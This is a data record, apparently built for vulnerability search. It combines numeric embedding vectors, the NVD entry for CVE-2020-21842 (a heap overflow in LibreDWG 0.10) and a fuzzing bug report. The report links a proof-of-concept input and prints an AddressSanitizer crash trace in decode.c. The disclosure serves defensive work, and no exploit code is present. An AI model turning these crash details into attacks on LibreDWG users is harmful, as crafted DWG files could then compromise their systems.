-0.003030788619071245, -0.014275300316512585, -0.0019426585640758276, -0.03354213386774063, 0.005066887475550175, -0.012936990708112717, 0.008355391211807728, 0.01631290651857853, -0.012563228607177734, -0.023064738139510155, -0.01937534473836422, 0.014504380524158478, 0.00813233945518732, 0.03667691349983215, -0.012490888126194477, 0.009500791318714619, -0.020677482709288597, 0.008578442968428135, -0.008409647271037102, 0.00926568266004324, 0.000040173774323193356, 0.007607867009937763, -0.00031988308182917535, 0.015637723729014397, -0.01919449120759964, 0.02471652440726757, -0.026476824656128883, 0.012418546713888645, -0.010881299152970314, -0.0186519343405962, -0.011863932013511658, -0.01564978063106537, 0.023414386436343193, -0.004222908988595009, -0.012454717420041561, -0.019640594720840454, 0.018434910103678703, 0.013383094221353531, -0.00797560065984726, 0.017892353236675262, 0.020110812038183212, 0.021340610459446907, -0.012683797627687454, 0.0037617345806211233, 0.007209991104900837, -0.006209273356944323, -0.0007784198387525976, 0.006366012152284384, 0.012647626921534538, -0.010628106072545052, 0.01373274251818657, -0.019568253308534622, -0.004057127051055431, 0.007656094618141651, 0.014588777907192707, -0.0006148989195935428, -0.0034723703283816576, 0.0033397451043128967, -0.016337020322680473, 0.006745802704244852, -0.012912876904010773, 0.02003847062587738, 0.00606157723814249, 0.0020195210818201303, 0.020002299919724464, -0.010001149959862232, 0.000044271215301705524, 0.005971150938421488, 0.00654083676636219, -0.02310090884566307, 0.026621505618095398, 0.010218173265457153, -0.0012946033384650946, 0.0177476704120636, -0.02099096029996872, -0.012707911431789398, -0.004819722380489111, 0.006956797558814287, -0.013431321829557419, -0.011490169912576675, -0.0010127746500074863, 0.002293814206495881, -0.004542415030300617, -0.03156481310725212, 0.022823601961135864, -0.005702886264771223, 0.0036713082809001207, 0.02584986761212349, 0.0042289369739592075, -0.009669587016105652, 0.01697603240609169, -0.007993686012923717, -0.002500287489965558, -0.020737767219543457, -0.005971150938421488, -0.012840536423027515, -0.03785848245024681, -0.009856468066573143, -0.004476102534681559, 0.012768195010721684, 0.00040164354140870273, 0.01769944280385971, 0.01388948131352663, 0.03419320285320282, 0.02507822960615158, 0.009844411164522171, 0.009241568855941296, 0.028478259220719337, -0.005853596609085798, 0.00956710334867239, -0.029298124834895134, 0.009072773158550262, 0.013310752809047699, 0.0015734178014099598, -0.017012203112244606, -0.008059998974204063, -0.02052074484527111, -0.005763170309364796, 0.016843408346176147, -0.003580881981179118, -0.0073365881107747555, 0.019206548109650612, 0.0009110451210290194, -0.007505383808165789, 0.01187598891556263, -0.013937708921730518, 0.025994550436735153, -0.0014543564757332206, 0.011972444131970406, 0.011200806125998497, 0.013045502826571465, 0.008011771366000175, -0.0015040909638628364, -0.004394718911498785, -0.005956079810857773, -0.0143114710226655, 0.0018205831293016672, -0.014673176221549511, 0.0048800064250826836, -0.009470649063587189, -0.006956797558814287, 0.017675328999757767, -0.011044067330658436, 0.015854746103286743, -0.02159380353987217, 0.007601838558912277, -0.016349077224731445, 0.0026314056012779474, 0.02129238285124302, 0.005974165163934231, 0.002736903028562665, 0.013033445924520493, -0.013925652019679546, -0.01187598891556263, 0.012502945028245449, -0.023739920929074287, 0.006595092359930277, -0.005181427579373121, -0.01794058084487915, -0.0066794902086257935, -0.038967713713645935, -0.005359265953302383, -0.0031016224529594183, 0.004503230564296246, -0.006613177713006735, 0.0049583762884140015, -0.002641955390572548, -0.023197364062070847, 0.006197216454893351, -0.005075930152088404, 0.009301853366196156, 0.0013435842702165246, 0.00648055225610733, -0.01358806062489748, 0.008524186909198761, 0.002724846126511693, -0.0004988518194295466, 0.014564665034413338, 0.01310578640550375, 0.006637291517108679, 0.0073124743066728115, 0.0015063516329973936, -0.017361851409077644, -0.006552893202751875, 0.02202785015106201, 0.01836257055401802, -0.015046938322484493, -0.011743363924324512, 0.0066855186596512794, 0.010989811271429062, 0.017168942838907242, 0.007083394564688206, -0.02219664491713047, 0.0322641097009182, 0.005901823751628399, 0.007571696303784847, 0.033035747706890106, -0.006079662591218948, -0.020146982744336128, 0.007969572208821774, 0.0022923070937395096, 0.010453281924128532, -0.00035869103157892823, -0.0006333609344437718, 0.006158031988888979, 0.0033367308788001537, 0.004843836184591055, 0.015276018530130386, -0.024692412465810776, -0.01854342222213745, 0.0024761739186942577, -0.005811397451907396, -0.011303288862109184, -0.009133057668805122, 0.030672604218125343, -0.01004937756806612, 0.02411368303000927, -0.004494187887758017, -0.007571696303784847, -0.0042319511994719505, -0.005811397451907396, -0.006498637609183788, 0.0033126173075288534, -0.004343477077782154, 0.003390986705198884, 0.026139233261346817, 0.01265968382358551, -0.018024977296590805, 0.023559069260954857, -0.008295106701552868, -0.009446535259485245, -0.014624948613345623, 0.00869901105761528, 0.008403618820011616, -0.02734491601586342, 0.002852950245141983, 0.018037034198641777, -0.020364005118608475, 0.018326399847865105, -0.015360415913164616, 0.039257075637578964, 0.019893787801265717, -0.01804909110069275, 0.0079153161495924, 0.02326970361173153, -0.014070333912968636, -0.009983064606785774, 0.017253341153264046, -0.0042982641607522964, 0.0013925652019679546, 0.06115230172872543, -0.011194777674973011, 0.00037187820998951793, -0.02818889543414116, -0.021256212145090103, 0.006974882911890745, 0.004795608576387167, -0.011677050963044167, 0.006998996715992689, -0.012900820933282375, -0.010670305229723454, -0.00001150933894678019, -0.017651215195655823, -0.011447970755398273, -0.016843408346176147, 0.0000670190856908448, -0.0017949623288586736, -0.019206548109650612, -0.01667461171746254, -0.01866399124264717, 0.010790873318910599, 0.0015839675907045603, 0.0012757645454257727, -0.0024641170166432858, 0.011134493164718151, -0.011224919930100441, 0.010531650856137276, -0.022751260548830032, 0.00923554040491581, 0.006359984166920185, 0.002509330166503787, -0.007873117923736572, -0.01181570440530777, 0.0031799920834600925, 0.0017407065024599433, 0.002097890479490161, -0.006739774253219366, -0.016517873853445053, 0.008524186909198761, -0.0009864004096016288, 0.01367245800793171, -0.019773220643401146, -0.008373476564884186, -0.008494044654071331, -0.005826468579471111, 0.0217746552079916, 0.001287067891098559, -0.007523469161242247, 0.0062273587100207806, -0.010242287069559097, 0.001213219715282321, -0.011393715627491474, -0.02645271085202694, -0.0122979786247015, -0.029852740466594696, 0.0042651076801121235, -0.00676388805732131, -0.005720971152186394, 0.006558921653777361, -0.009018517099320889, -0.006197216454893351, -0.014998710714280605, -0.004123440012335777, -0.008650783449411392, -0.004069183953106403, -0.009850439615547657, 0.015625666826963425, -0.01217740960419178, -0.016783123835921288, -0.007023110054433346, 0.029852740466594696, 0.011532369069755077, 0.013346923515200615, 0.0060043069534003735, -0.0007023110520094633, 0.008922062814235687, 0.0066794902086257935, -0.013817140832543373, 0.005244726315140724, 0.013129900209605694, 0.007818861864507198, -0.0032764466013759375, -0.002616334706544876, -0.010296543128788471, 0.009169228374958038, -0.005733028054237366, 0.026669733226299286, 0.003993828780949116, -0.0007445099763572216, -0.00006245067197596654, -0.006145975086838007, -0.002595235127955675, 0.031830061227083206, -0.01769944280385971, 0.00519047025591135, -0.020134925842285156, 0.0016668583266437054, 0.015348359011113644, 0.007849004119634628, 0.01631290651857853, -0.009259654209017754, 0.024583900347352028, 0.003885317128151655, -0.006025406531989574, 0.007270275615155697, -0.02027960680425167, -0.0034663418773561716, -0.007939429953694344, -0.01010966207832098, 0.01055576466023922, 0.001093404833227396, -0.013069616630673409, 0.02124415524303913, 0.002534950850531459, -0.013503662310540676, 0.011080237105488777, -0.012575285509228706, -0.004171667154878378, -0.006378069054335356, 0.0069145988672971725, -0.009946893900632858, 0.005078944377601147, 0.0010979261714965105, 0.0016774081159383059, 0.010640162974596024, 0.002036099089309573, -0.00915114302188158, -0.009434478357434273, 0.012623513117432594, 0.010911441408097744, 0.007716378662735224, 0.010290514677762985, 0.00775254936888814, 0.017554761841893196, 0.016963975504040718, -0.013286639004945755, 0.017422135919332504, -0.013600117526948452, -0.00704722385853529, -0.009916752576828003, -0.0008899456006474793, -0.0008191116503439844, -0.0019667723681777716, 0.008783409371972084, 0.012346206232905388, 0.003710492979735136, -0.003960672300308943, -0.027730735018849373, 0.02351084165275097, -0.008258936926722527, -0.016843408346176147, 0.03809962049126625, -0.009169228374958038, 0.01502282451838255, -0.008463902398943901, -0.02616334706544876, 0.008566386066377163, 0.008126311004161835, 0.00030123264878056943, 0.010031292214989662, 0.02292005531489849, -0.02592220902442932, 0.02556050382554531, 0.007897230796515942, 0.031878288835287094, -0.009253625757992268, -0.001796469441615045, 0.020653368905186653, -0.015215734019875526, -0.014070333912968636, -0.008572414517402649, -0.0010753195965662599, 0.025994550436735153, 0.0023902689572423697, -0.0037496776785701513, -0.03076905943453312, 0.012316063977777958, 0.002681140089407563, 0.03793082386255264, 0.016107941046357155, -0.0013096744660288095, -0.0028861064929515123, 0.012026699259877205, -0.00023096386576071382, -0.02734491601586342, 0.017349794507026672, 0.01302138902246952, 0.002577150007709861, 0.005850582383573055, 0.014323527924716473, 0.0202675499022007, 0.005525047890841961, 0.008723124861717224, -0.004656955134123564, -0.008433761075139046, -0.008463902398943901, 0.027489598840475082, -0.009766041301190853, -0.015529211610555649, 0.003216162556782365, -0.0019637581426650286, -0.028213009238243103, 0.00220489501953125, 0.011526340618729591, -0.0066614048555493355, -0.01804909110069275, 0.03245701640844345, -0.007849004119634628, 0.009808240458369255, -0.010435196571052074, -0.010519593954086304, 0.027152007445693016, 0.02002641372382641, -0.01619233749806881, 0.019158320501446724, 0.006311756558716297, 0.00929582491517067, -0.007553611416369677, 0.0026977183297276497, 0.00789120327681303, -0.011466056108474731, -0.009289796464145184, 0.004735324531793594, 0.01835051365196705, 0.0016623369883745909, 0.01602354273200035, 0.01804909110069275, -0.007885174825787544, -0.027803076431155205, -0.002373690716922283, -0.003972729202359915, 0.013901538215577602, 0.007427014410495758, -0.012707911431789398, 0.013431321829557419, -0.020593086257576942, -0.011960387229919434, -0.01493842713534832, -0.006420268211513758, -0.0008726139203645289, 0.018254058435559273, 0.02314913645386696, -0.015517154708504677, -0.007631980814039707, -0.016047656536102295, -0.001022570882923901, -0.016963975504040718, -0.002162695862352848, 0.015529211610555649, 0.006396154407411814, 0.0021340609528124332, -0.006170088890939951, -0.003924502059817314, -0.0020255493000149727, 0.0036260951310396194, -0.012111097574234009, 0.004180709831416607, 0.016638441011309624, -0.01487814262509346, 0.0003398522094357759, -0.03564002364873886, -0.026139233261346817, -0.023547012358903885, -0.024909434840083122, 0.013865367509424686, -0.00712559325620532, -0.004789580125361681, 0.0042922357097268105, -0.0018688105046749115, -0.005238697864115238, 0.0010926512768492103, 0.011351516470313072, -0.007071337662637234, -0.028767624869942665, -0.006703604012727737, -0.012949047610163689, 0.001784412539564073, 0.014733460731804371, -0.01697603240609169, 0.005332138389348984, 0.021268269047141075, 0.016578156501054764, 0.006866371259093285, -0.024620071053504944, 0.01091746985912323, 0.006408211309462786, -0.0034663418773561716, -0.006974882911890745, -0.01848313771188259, 0.00998909305781126, -0.01955619640648365, 0.019303003326058388, 0.006152003537863493, 0.01668666861951351, -0.01804909110069275, -0.014829915016889572, -0.0026675763074308634, 0.025946322828531265, 0.005199512932449579, 0.0049523478373885155, 0.016457589343190193, 0.012478831224143505, 0.01403416320681572, 0.006830200552940369, 0.01094761211425066, -0.011243004351854324, -0.02159380353987217, 0.01259939931333065, -0.0036019813269376755, 0.017168942838907242, -0.014299414120614529, -0.009464620612561703, 0.01804909110069275, 0.006347927264869213, -0.027441371232271194, -0.009078801609575748, -0.028285350650548935, -0.01212315447628498, -0.01595120131969452, -0.011441942304372787, 0.00712559325620532, -0.0026178418193012476, 0.013262526132166386, 0.009211426600813866, 0.020966848358511925, 0.002266686176881194, -0.002629898488521576, -0.009621359407901764, -0.001182324020192027, 0.0037707772571593523, -0.021364722400903702, -0.003544711507856846, 0.002543993527069688, 0.01322635542601347, -0.019640594720840454, -0.015613609924912453, 0.027610167860984802, -0.017494477331638336, 0.0009442014270462096, 0.012490888126194477, 0.018579592928290367, 0.015734178945422173, 0.025512276217341423, 0.003972729202359915, 0.026790302246809006, 0.005039759911596775, -0.009211426600813866, -0.011224919930100441, 0.008916034363210201, -0.008210709318518639, -0.0016713796649128199, -0.021871110424399376, -0.03156481310725212, 0.010169945657253265, -0.01595120131969452, 0.005335152614861727, 0.0033186457585543394, -0.0017979765543714166, -0.028405919671058655, 0.0007497848127968609, 0.007939429953694344, -0.02334204502403736, -0.011779534630477428, 0.013865367509424686, 0.010145831853151321, 0.004813693929463625, -0.029056988656520844, 0.01097775436937809, 0.008457873947918415, 0.010971725918352604, 0.03084140084683895, 0.009157171472907066, -0.008270992897450924, -0.0006017117411829531, 0.010435196571052074, -0.015866803005337715, -0.0033487877808511257, -0.012635570019483566, 0.0022290085908025503, 0.0002995371469296515, 0.00522061251103878, 0.015167506411671638, 0.02939458005130291, 0.021280325949192047, 0.022534236311912537, 0.0003861956938635558, -0.0013473520521074533, 0.0021732456516474485, 0.007806804962456226, -0.009331995621323586, -0.008391561917960644, -0.00471121072769165, 0.002932826755568385, -0.0009524904889985919, 0.03088962845504284, -0.011327402666211128, 0.007788719609379768, 0.004014928359538317, 0.003879288677126169, 0.01979733444750309, 0.001855246489867568, -0.01800086535513401, 0.019507968798279762, -0.002198866568505764, -0.0026253771502524614, -0.01614411175251007, -0.006998996715992689, 0.013214298523962498, -0.019688822329044342, 0.00098941451869905, -0.012707911431789398, 0.007957515306770802, 0.005398450884968042, 0.009054687805473804, 0.0000430702420999296, -0.0055521754547953606, -0.02657327800989151, 0.005226640962064266, 0.012038756161928177, 0.020966848358511925, 0.019990243017673492, 0.00301571749150753, 0.003975743427872658, 0.011261089704930782, -0.013997993431985378, 0.01667461171746254, -0.018266115337610245, 0.011851875111460686, 0.0017030289163812995, -0.010067462921142578, -0.005844553932547569, -0.021690258756279945, 0.016216451302170753, 0.02279948815703392, 0.015336302109062672, 0.017241284251213074, 0.01931506022810936, 0.005696857813745737, -0.0013722192961722612, 0.007065309211611748, 0.016843408346176147, 0.0015930101508274674, 0.006115832831710577, -0.017615046352148056, -0.0008500073454342782, 0.008897949010133743, -0.0128043657168746, 0.00036321234074421227, -0.026476824656128883, 0.0066433195024728775, -0.005012631881982088, 0.012213580310344696, 0.018459023907780647, 0.0018597678281366825, -0.003966700751334429, -0.005145257338881493, 0.001621645176783204, 0.001956222578883171, -0.014166789129376411, 0.019664708524942398, 0.022823601961135864, 0.01127917505800724, -0.015372472815215588, -0.005033731460571289, 0.0029509118758141994, 0.002027056412771344, -0.0049372767098248005, 0.0008801494259387255, 0.031830061227083206, -0.021907281130552292, -0.013069616630673409, -0.0010203102137893438, 0.009223483502864838, 0.015866803005337715, 0.002158174756914377, -0.002257643500342965, -0.015276018530130386, -0.03076905943453312, 0.0010270922211930156, 0.00965753011405468, -0.022305157035589218, -0.00572699960321188, -0.0022501081693917513, 0.00890397746115923, -0.005139228887856007, -0.045791883021593094, 0.025005890056490898, -0.006034449208527803, -0.0207618810236454, -0.0022621648386120796, 0.001216233940795064, 0.0002995371469296515, 0.02106330171227455, 0.004135496448725462, 0.010953640565276146, -0.007867089472711086, 0.020291663706302643, 0.004810679703950882, -0.014624948613345623, 0.0012885750038549304, -0.016300849616527557, -0.025753414258360863, -0.004650926683098078, 0.007451128214597702, 0.020424289628863335, -0.014419982209801674, 0.009585188701748848, 0.007499355357140303, 0.01854342222213745, -0.0024671312421560287, -0.021159756928682327, 0.00803588517010212, 0.00043593018199317157, -0.01274408120661974, 0.015734178945422173, -0.002293814206495881, 0.0012260300572961569, -0.00037489240639843047, -0.004394718911498785, -0.009940865449607372, 0.005717956926673651, 0.004337448626756668, 0.0073305596597492695, -0.009283768013119698, 0.011200806125998497, 0.003698436077684164, 0.006516722962260246, -0.01596325822174549, -0.002221473027020693, 0.0157221220433712, -0.005033731460571289, -0.013720685616135597, 0.02669384703040123, -0.00010653350182110444, 0.0006299699889495969, -0.010314627550542355, 0.0014942948473617435, 0.028526486828923225, -0.0004039041814394295, -0.005057845264673233, 0.003692407626658678, 0.004476102534681559, 0.005672744009643793, 0.001609588391147554, -0.013925652019679546, 0.028285350650548935, -0.00012951684766449034, -0.002307377988472581, -0.005440649576485157, -0.022473953664302826, 0.003695421852171421, 0.004382662009447813, -0.005021674558520317, -0.0004604206478688866, -0.02278743125498295, -0.0031528640538454056, -0.005178413353860378, 0.016409361734986305, 0.01517956331372261, 0.007451128214597702, -0.013455435633659363, 0.027610167860984802, -0.015058995224535465, 0.011122436262667179, 0.01739802211523056, 0.009651501663029194, 0.021822882816195488, -0.01487814262509346, 0.0014641527086496353, -0.02208813466131687, -0.004702168051153421, -0.024330707266926765, -0.02777896262705326, -0.010965697467327118, 0.003873260458931327, -0.026766188442707062, 0.0016743938904255629, -0.005672744009643793, 0.0015018302947282791, -0.007927373051643372, -0.005889767315238714, -0.0023028566502034664, 0.028116554021835327, -0.020593086257576942, 0.0019426585640758276, 0.0066975755617022514, 0.010784844867885113, -0.010634134523570538, 0.021798769012093544, 0.007957515306770802, 0.004867949988692999, -0.0030925797764211893, 0.007589781656861305, -0.0036411662586033344, -0.028960533440113068, 0.0055793034844100475, -0.02423425205051899, -0.0027971873059868813, 0.025946322828531265, -0.007191906217485666, 0.016300849616527557, 0.010013206861913204, -0.02105124481022358, -0.013033445924520493, -0.00939227920025587, -0.022172531113028526, 0.00718587776646018, -0.008855749852955341, -0.002834864892065525, -0.0230888519436121, 0.0032885035034269094, 0.002396297175437212, -0.00580536900088191, 0.0399322584271431, -0.018868956714868546, 0.03216765448451042, 0.007806804962456226, 0.0007588274893350899, -0.013419264927506447, -0.004518301226198673, -0.008916034363210201, 0.017289509996771812, -0.00003737149745575152, -0.0027474528178572655, 0.0024565814528614283, 0.009856468066573143, -0.002733888803049922, 0.0011160114081576467, -0.0014671669341623783, -0.012563228607177734, 0.000574207108002156, -0.007981629110872746, -0.011357544921338558, 0.015818575397133827, 0.011598682031035423, -0.00572699960321188, 0.009458592161536217, -0.001799483667127788, -0.017193056643009186, 0.020074641332030296, 0.0016759010031819344, 0.02202785015106201, -0.015854746103286743, 0.02572930045425892, 0.03387972339987755, 0.017012203112244606, 0.00210693315602839, 0.0025017946027219296, 0.020954791456460953, -0.002660040743649006, 0.011146550066769123, 0.004186738282442093, 0.0011755420127883554, 0.011562511324882507, -0.022630691528320312, -0.03660457208752632, -0.017024260014295578, -0.01931506022810936, 0.01041108276695013, -0.005859625060111284, -0.008674897253513336, -0.011646908707916737, 0.0014716882724314928, -0.0013624230632558465, -0.003891345579177141, -0.012340177781879902, 0.0020496631041169167, -0.013780970126390457, 0.0008515144581906497, 0.013057559728622437, -0.007499355357140303, -0.026669733226299286, -0.009886610321700573, -0.010296543128788471, -0.01990584470331669, 0.0010391490068286657, -0.006595092359930277, -0.015348359011113644, 0.01094761211425066, 0.004852878861129284, 0.02580164186656475, 0.0005293706781230867, 0.009012488648295403, 0.007939429953694344, -0.01041108276695013, -0.004581599961966276, -0.019568253308534622, 0.01058590691536665, -0.02243778295814991, 0.007842975668609142, -0.00923554040491581, -0.0148178581148386, 0.013178127817809582, -0.012840536423027515, 0.01100789662450552, 0.02657327800989151, -0.003018731717020273, -0.007553611416369677, -0.0026283913757652044, 0.0029976321384310722, 0.0012313049519434571, 0.007674179505556822, 0.004482130985707045, 0.02777896262705326, 0.002970504341647029, 0.00603143498301506, -0.02326970361173153, 0.008741210214793682, -0.01025434397161007, 0.019652651622891426, -0.006311756558716297, 0.013985936529934406, -0.012310035526752472, 0.020556915551424026, -0.014841971918940544, -0.02279948815703392, 0.0037858481518924236, -0.0036652798298746347, -0.009380223229527473, 0.013925652019679546, -0.013274583034217358, -0.0023691693786531687, 0.015107222832739353, 0.03168537840247154, 0.003894359804689884, -0.021690258756279945, -0.0023450558073818684, 0.020568972453475, -0.004681068938225508, -0.00830716360360384, -0.014444096013903618, 0.014082390815019608, 0.0019079952035099268, 0.0016849435633048415, 0.020918620750308037, 0.016951918601989746, -0.0003716898208949715, 0.008186595514416695, -0.006872399710118771, 0.011851875111460686, 0.0031317647080868483, 0.0128043657168746, 0.03633932024240494, 0.01638524793088436, -0.0036502087023109198, 0.007662123069167137, -0.0005060105468146503, 0.021629974246025085, 0.013286639004945755, 0.0009404336451552808, 0.012183438055217266, 0.008536243811249733, 0.020303720608353615, 0.007252190262079239, 0.04366987943649292, -0.007402900606393814, -0.01638524793088436, -0.002399311400949955, 0.01019405946135521, 0.01157456822693348, -0.011321374215185642, -0.03315631300210953, -0.011520312167704105, 0.013612174428999424, 0.0049191913567483425, 0.007999714463949203, 0.0021054260432720184, -0.007957515306770802, 0.01810937561094761, -0.019724993035197258, 0.012949047610163689, 0.0028032157570123672, 0.02536759525537491, 0.009253625757992268, -0.004611741751432419, -0.0158306322991848, 0.00454542925581336, 0.014926370233297348, 0.004482130985707045, -0.011273146606981754, 0.010091576725244522, 0.005271853879094124, -0.004792594350874424, -0.006037463434040546, -0.013563946820795536, 0.007939429953694344, 0.004485145211219788, 0.014118561521172523, 0.010477395728230476, -0.005365294404327869, 0.016578156501054764, -0.019483856856822968, 0.011080237105488777, 0.007083394564688206, 0.004970432724803686, -0.026476824656128883, -0.0042319511994719505, 0.00457557151094079, 0.0055702608078718185, 0.007011053618043661, -0.014239129610359669, -0.010778816416859627, -0.005751113407313824, -0.006043491885066032, -0.007222048006951809, 0.01259939931333065, -0.0003104636853095144, -0.009506819769740105, -0.013069616630673409, -0.00039448478491976857, -0.00923554040491581, 0.0066493479534983635, 0.006179131101816893, 0.016759010031819344, -0.020556915551424026, -0.007668151054531336, 0.013057559728622437 ]
CVE-2020-21842
2021-05-17T22:15:07.407000
A heap based buffer overflow vulnerability exists in GNU LibreDWG 0.10 via read_2004_section_revhistory ../../src/decode.c:3051.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Product" ], "url": "http://gnu.com" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493684" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gnu:libredwg:0.10:*:*:*:*:*:*:*", "matchCriteriaId": "C3E7D34E-1D80-4CF0-8110-412C6D8514EF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/LibreDWG/libredwg/issues/188#issuecomment-574493684
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "LibreDWG", "libredwg" ]
Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ```
Several bugs found by fuzzing
https://api.github.com/repos/LibreDWG/libredwg/issues/188/comments
15
2020-01-15T04:37:59
2020-01-16T23:22:04Z
https://github.com/LibreDWG/libredwg/issues/188
549,961,224
188
true
This is a GitHub Issue repo:libredwg owner:LibreDWG Title : Several bugs found by fuzzing Issue date: --- start body --- Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: ./dwgbmp $PoC **1.NULL pointer dereference in read_2004_compressed_section ../../src/decode.c:2417** POC: https://github.com/linhlhq/research/blob/master/PoCs/libreDWG_4c26d37/id:000012%2Csig:06%2Csrc:002489%2Cop:havoc%2Crep:16 ``` ================================================================= ==20486==ERROR: AddressSanitizer: SEGV on unknown address 0x62904165558b (pc 0x7fa1bce115c5 bp 0x7fff8e06b350 sp 0x7fff8e06aab8 T0) ==20486==The signal is caused by a READ memory access. #0 0x7fa1bce115c4 (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) #1 0x7fa1bd55e6ce (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x796ce) #2 0x5634364fc7b6 in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34 #3 0x5634364fc7b6 in read_2004_compressed_section ../../src/decode.c:2417 #4 0x563436ac5dd2 in read_2004_section_summary ../../src/decode.c:2785 #5 0x563436ac5dd2 in decode_R2004 ../../src/decode.c:3352 #6 0x563436ad208d in dwg_decode ../../src/decode.c:246 #7 0x563436464fae in dwg_read_file ../../src/dwg.c:211 #8 0x5634364639d0 in get_bmp ../../programs/dwgbmp.c:111 #9 0x563436463066 in main ../../programs/dwgbmp.c:280 #10 0x7fa1bcd77b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #11 0x5634364636c9 in _start (/home/user/linhlhq/libredwg/asan_build/programs/dwgbmp+0x28f6c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/lib/x86_64-linux-gnu/libc.so.6+0xbb5c4) ``` --- end body ---
1,738
[ -0.017580561339855194, 0.021801086142659187, -0.004484306555241346, 0.015574326738715172, 0.05088406056165695, 0.05459931120276451, -0.017342785373330116, 0.0450882725417614, -0.019051801413297653, 0.02816159278154373, -0.012178588658571243, 0.0009311345056630671, 0.011881369166076183, 0.012074561789631844, -0.010581031441688538, 0.014660376124083996, -0.0030074946116656065, 0.008076952770352364, -0.02303454838693142, -0.027165906503796577, 0.028429090976715088, -0.005988982506096363, -0.017654867842793465, 0.021310672163963318, -0.025501474738121033, 0.004291113466024399, -0.005751206539571285, -0.007750011049211025, -0.017833199352025986, 0.01728334277868271, 0.01428885105997324, 0.022083444520831108, 0.017966948449611664, 0.0009882564190775156, 0.03765777125954628, -0.010558740235865116, 0.044196613132953644, 0.060781486332416534, 0.013508648611605167, 0.03421001881361008, 0.005483708810061216, -0.07377000153064728, -0.02128094993531704, 0.0145860705524683, -0.011836785823106766, -0.008649101480841637, 0.0284439530223608, 0.016748346388339996, -0.013367468491196632, -0.0019913739524781704, -0.011472691781818867, -0.017313063144683838, -0.03545834496617317, -0.07382944226264954, 0.04333467409014702, -0.017550839111208916, 0.03319947049021721, 0.022707607597112656, 0.004915275610983372, -0.005951830185949802, -0.018605971708893776, 0.030732546001672745, -0.0034143144730478525, 0.027656318619847298, 0.006728317588567734, 0.020805398002266884, -0.03994636610150337, 0.007434214930981398, -0.02762659825384617, -0.00524221733212471, 0.003527629654854536, -0.04440466687083244, -0.00516419718042016, 0.027403682470321655, 0.021697059273719788, -0.006642866414040327, 0.011888799257576466, 0.011814494617283344, -0.01668890193104744, 0.022945383563637733, -0.013122262433171272, 0.042234960943460464, -0.03525029122829437, 0.017610283568501472, 0.00803237035870552, 0.005795789882540703, -0.022172611206769943, -0.08357825875282288, -0.006252765189856291, -0.045920487493276596, -0.004725797567516565, 0.03082171268761158, 0.024431481957435608, -0.008715976029634476, 0.017491396516561508, -0.010959986597299576, -0.04015441983938217, -0.017194176092743874, -0.048506300896406174, -0.011190332472324371, -0.038727764040231705, -0.005636034067720175, -0.011755050159990788, 0.011130888015031815, 0.03195114806294441, 0.018605971708893776, 0.0030353590846061707, -0.01578238047659397, 0.006263911258429289, 0.1136569231748581, 0.0014387305127456784, -0.00844847783446312, -0.038549430668354034, -0.0061413077637553215, -0.006906649563461542, 0.008834864012897015, 0.03765777125954628, -0.007623692508786917, -0.057482343167066574, -0.024877311661839485, 0.0010588462464511395, -0.03212948143482208, 